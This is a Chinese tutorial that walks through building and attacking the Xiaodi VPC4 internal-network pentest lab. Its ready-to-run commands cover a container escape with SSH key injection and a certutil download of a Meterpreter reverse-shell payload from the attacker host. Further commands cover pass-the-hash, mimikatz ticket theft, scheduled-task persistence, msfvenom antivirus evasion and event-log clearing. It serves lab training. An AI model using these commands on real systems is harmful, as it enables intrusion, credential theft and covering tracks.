零基础实战:小迪安全VPC4靶场搭建与内网渗透全流程解析
第一次接触内网渗透时,最令人头疼的往往不是技术原理,而是环境搭建这个"拦路虎"。本文将带你从零开始,用最直观的方式完成小迪安全VPC4靶场的部署与攻防复现。不同于单纯罗列命令的技术文档,这里会详细解释每个步骤的底层逻辑,并标注新手容易踩坑的细节。
1. 靶场环境准备与初始化
1.1 虚拟机镜像获取与验证
建议从官方渠道下载以下镜像文件:
- Ubuntu攻击机(预装Kali工具集)
- Windows Server 2008 DC(域控制器)
- Windows 10(通达OA模拟环境)
- Windows Server 2012(SQL Server)
重要验证步骤:
# 检查镜像SHA256值确保完整性 sha256sum Ubuntu_Attack.img sha256sum Win2008_DC.img1.2 网络拓扑配置
典型实验环境应采用NAT+Host-Only混合模式:
| 设备类型 | 网络适配器1 | 网络适配器2 |
|---|---|---|
| Ubuntu攻击机 | NAT | Host-Only |
| Win2008DC | Host-Only | - |
| Win10-通达OA | Host-Only | - |
注意:VirtualBox用户需在全局设置中创建名为"vboxnet0"的Host-Only网络
1.3 系统账号核对
启动所有虚拟机后,请确认以下默认凭证:
Windows域账户:
- 域名:God
- 域管:administrator/Admin12345
- 普通用户:webadmin/admin!@#45
本地管理员账户:
- Win10通达OA: * administrator/admin!@#456 * xiaosedi/xsd!@#45 - Win2008 WebServer: * .\administrator/admin!@#452. 攻击面建立与初始突破
2.1 Docker逃逸漏洞利用
在Ubuntu攻击机上执行:
cd /home/kali/Desktop/vulhub/shiro/CVE-2016-4437 docker-compose up -d关键问题排查:
- 若报错"permission denied",需执行:
sudo chmod +x /usr/local/bin/docker-compose - 检查容器状态:
docker ps -a | grep shiro
2.2 持久化后门部署
成功利用漏洞后,通过以下步骤建立SSH通道:
# 查看磁盘分区 fdisk -l # 挂载主机磁盘 mkdir /test && mount /dev/sda3 /test # 写入SSH公钥 echo 'ssh-rsa AAAAB3Nza...' > /test/root/.ssh/authorized_keys经验提示:建议使用新终端测试SSH连接,保持当前会话用于后续操作
3. 横向移动技术实战
3.1 通达OA漏洞链利用
通过已建立的通道上传MSF木马:
# Python简易HTTP服务 python3 -m http.server 8080在Windows靶机执行:
certutil -urlcache -split -f http://<攻击机IP>:8080/1115.exe C:\1115.exe Start-Process C:\1115.exeMSF监听配置要点:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <监听IP> set LPORT 1115 set ExitOnSession false run -j3.2 密码喷射攻击实战
使用CrackMapExec进行自动化测试:
proxychains4 crackmapexec smb 192.168.3.21-32 \ -u administrator -H 518b98ad4178a53695dc997aa02d455c \ --local-auth -x "cmd /c whoami"参数解析:
-H:指定NTLM哈希--local-auth:强制本地账户认证-x:执行远程命令
4. 权限提升与域控突破
4.1 Kerberos票据攻击
从内存导出票据后:
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"注入票据实现权限提升:
kerberos::ptt [0;3e4]-2-1-40e00000-SQLSERVER$@krbtgt-GOD.ORG.kirbi验证票据有效性:
dir \\owa2010cn-god\c$4.2 计划任务持久化
通过schtasks创建隐蔽通道:
schtasks /create /s 192.168.3.21 /ru "SYSTEM" /tn beacon /sc DAILY /tr "C:\1115.exe" /F schtasks /run /s 192.168.3.21 /tn beacon5. 防御规避与痕迹清理
5.1 木马免杀处理
使用以下技术降低检测率:
- 分段加密payload
- 合法证书签名
- API调用混淆
实用混淆命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.3.130 LPORT=1115 -f exe -e x86/shikata_ga_nai \ -i 5 -x legit.exe -k -o web.exe5.2 日志清除技巧
在Windows靶机上执行:
# 清除系统日志 wevtutil cl System wevtutil cl Security wevtutil cl Application # 删除文件操作记录 Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs' -Name *